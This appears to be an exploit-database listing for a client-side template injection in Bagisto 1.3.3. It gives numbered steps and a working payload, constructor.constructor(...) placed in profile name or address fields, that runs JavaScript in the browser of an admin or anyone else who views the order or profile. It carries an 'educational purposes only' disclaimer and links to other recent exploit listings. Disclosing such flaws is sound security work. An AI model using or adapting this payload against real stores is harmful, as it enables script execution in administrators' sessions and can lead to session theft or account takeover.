Bagisto 1.3.3 clientside template injection Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2021-11-26 | Type : webapps | Platform : multiple
This exploit / vulnerability Bagisto 1.3.3 clientside template injection is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: Bagisto 1.3.3 - Client-Side Template Injection
# Date: 11-25-2021
# Exploit Author: Mohamed Abdellatif Jaber
# Vendor Homepage: https://bagisto.com/en/
# Software Link: https://github.com/bagisto/bagisto
# Version: v1.3.3
# Tested on: [windows | chrome | firefox ]

Exploit :.
1- register an account and login your account
2- go to your profile and edit name , address
2- and put this payload {{constructor.constructor('alert(document.domain)')()}}
3- admin or any one view order or your profile will execute arbitrary JS-code
.

rf:https://portswigger.net/kb/issues/00200308_client-side-template-injection

Bagisto 1.3.3 clientside template injection


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Bagisto 1.3.3 clientside template injection Vulnerability / Exploit